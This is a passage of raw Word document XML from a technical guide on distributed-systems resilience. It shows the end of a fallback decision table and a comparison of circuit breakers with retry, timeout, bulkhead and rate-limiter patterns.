            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>If No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="748BE57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4A7252" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Can the user accept stale data?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107A4C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Serve from cache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308C87" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Return error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="3ECBD8E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EFF36F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Is there a secondary provider?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5AA916" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Failover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15A0F0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Return error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="68DF01B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4CD4DC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Can the operation be deferred?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8EC593" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Queue for later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3E8772" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Return error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="0C82E5A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52D45A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Is a degraded response better than no response?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A963F9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Return partial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6D3B26" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Return error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="694FC31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B181D4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Is a default/generic value meaningful?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CE5809" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Return default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14500D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Return error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33FBFDF5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="120D9162">
          <v:rect id="_x0000_i4246" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="654A671C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Circuit Breaker vs. Related Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72628578" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Circuit Breaker vs. Retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A746CD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54540A34" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Retries the SAME operation again after a failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37183DAA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Assumes the failure is transient (will succeed next time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38027541" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Can make things WORSE if the downstream is truly overloaded (retry storm).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515917ED" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit Breaker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F7CCB7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>STOPS retrying after detecting sustained failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A757EB7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Assumes the downstream is in a persistent failure state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088B2473" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Gives the downstream time to recover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D020DE4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>They work TOGETHER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DBD3EC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365DD462" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Request → Retry (attempts: 3, backoff) → if all retries fail → Circuit Breaker records failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A990AA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>After N failures → Circuit Breaker OPENS → Retries stop (no point retrying if circuit is open)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1F942A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The layering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5283D0E5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>First attempt fails → Retry policy says "try again after 1 second."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F1BF87" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Second attempt fails → Retry policy says "try again after 2 seconds."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464D6BD2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Third attempt fails → Retry policy exhausted. Circuit breaker records this as a failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232E1F99" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>After many such failures → Circuit opens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7EEEEC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Next request → Circuit breaker rejects immediately (no retries attempted at all).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA0B25F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Critical insight:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Retries are for TRANSIENT failures. Circuit breakers are for SUSTAINED failures. Without the circuit breaker, retries against a truly failing service amplify load by 3x (with 3 attempts), accelerating the cascade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E7A9CD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Circuit Breaker vs. Timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C69D54C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73288472" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Sets a maximum wait time for a single request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746E0053" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If the downstream doesn't respond in X seconds, give up on THAT request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0F542F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Each new request still attempts the call (waits up to X seconds again).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561D556E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit Breaker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E634C4E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>After detecting a pattern of timeouts/failures, PREVENTS new requests from waiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02732308" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Eliminates the per-request timeout cost entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1613A374" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Together:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A725FCE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Timeout protects a single request from waiting forever.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D210F7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit breaker protects the system from repeatedly paying the timeout cost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E1B73B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3F5B06" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Without circuit breaker:   1000 requests × 5s timeout = 5000 thread-seconds wasted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C93FA7A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>With circuit breaker:      1000 requests × 1ms rejection = 1 thread-second (5000x better)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FCF98F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Circuit Breaker vs. Bulkhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFE9155" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bulkhead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331A2E11" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Isolates resources. Each dependency gets its own resource pool (thread pool, connection pool).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6600E5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If dependency A consumes all its threads, dependency B's threads are unaffected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3D05F0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Limits the BLAST RADIUS of one failing dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1219C399" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit Breaker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01717E5B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Detects failure and stops calling the failing dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A091E41" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Limits the DURATION of impact from a failing dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADAA278" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>They're complementary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4097A88A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Without bulkhead, without circuit breaker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152992E6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Service A fails → ALL threads consumed waiting for A → entire system down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F53015" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>With bulkhead only:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37428E1D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Service A fails → A's thread pool (20 threads) exhausted → only A-related requests affected → rest of system healthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F52CB60" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>But those 20 threads are STILL burning on timeouts every request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7650D75F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>With bulkhead + circuit breaker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16634BE1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Service A fails → initial failures consume some threads → circuit opens → A's threads freed → those 20 threads are immediately available again (just returning errors instantly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A62ADA8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 Circuit Breaker vs. Rate Limiter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AD0BB4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rate Limiter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A6D408" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Proactively limits the RATE of requests to a downstream (regardless of health).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4620F000" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Prevents overloading a healthy service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A41992" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>"Never send more than 1000 requests/second."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A75F39E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit Breaker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0FDEB9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Reactively stops requests when failure is DETECTED.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE02F61" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Doesn't limit healthy traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8683B6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Only activates when things go wrong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F77D767" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Together:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238F4EAE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Rate limiter: "Don't overwhelm the downstream proactively."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCA2EE5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit breaker: "If the downstream is failing despite the rate limit, stop entirely."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2675DE2F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="2D8F2954">
          <v:rect id="_x0000_i4247" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D9867F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
